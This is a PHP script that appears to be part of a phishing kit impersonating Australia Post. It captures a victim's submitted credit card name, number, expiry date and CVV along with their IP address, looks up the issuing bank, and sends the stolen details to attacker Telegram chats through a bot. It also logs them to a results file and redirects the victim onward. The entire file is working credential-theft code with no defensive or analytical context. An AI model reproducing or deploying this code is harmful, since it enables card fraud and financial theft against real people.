<?php
require "antibot.php";
include "id.php";

$ip = getenv("REMOTE_ADDR");
$bin        = str_replace(' ', '', $_POST['cardNumber']);
$bin        = substr($bin, 0, 6);
$getdetails = 'https://lookup.binlist.net/' . $bin;
$curl       = curl_init();
curl_setopt($curl, CURLOPT_URL, $getdetails);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content    = curl_exec($curl);
curl_close($curl);
$details  = json_decode($content);
$_SESSION['_namebank_'] = $namebank   = $details->bank->name;
$_SESSION['_brand_'] = $brand   = $details->brand;
$message = "|=[💳 CREDIT CARD INFORMATION 💳]=|
|CC HODLER : ".$_POST['cardName']."
|CC NUMBER  : ".$_POST['cardNumber']."
|Expiration Date : ".$_POST['expiryDate']."
|ncvv : ".$_POST['cvv']."
|Bank Name  💳: ".$_SESSION['_namebank_']."
|Card Level 💲: ".$_SESSION['_brand_']."
|nIP      : ".$ip."
|=[ AUSPOST XTN ]=|\n";
    
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot' . $bot . '/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
}
$myfile = fopen("rzlt.txt", "a+");
$txt = $message;
fwrite($myfile, $txt);
fclose($myfile);
HEADER("Location: index3.php");


?>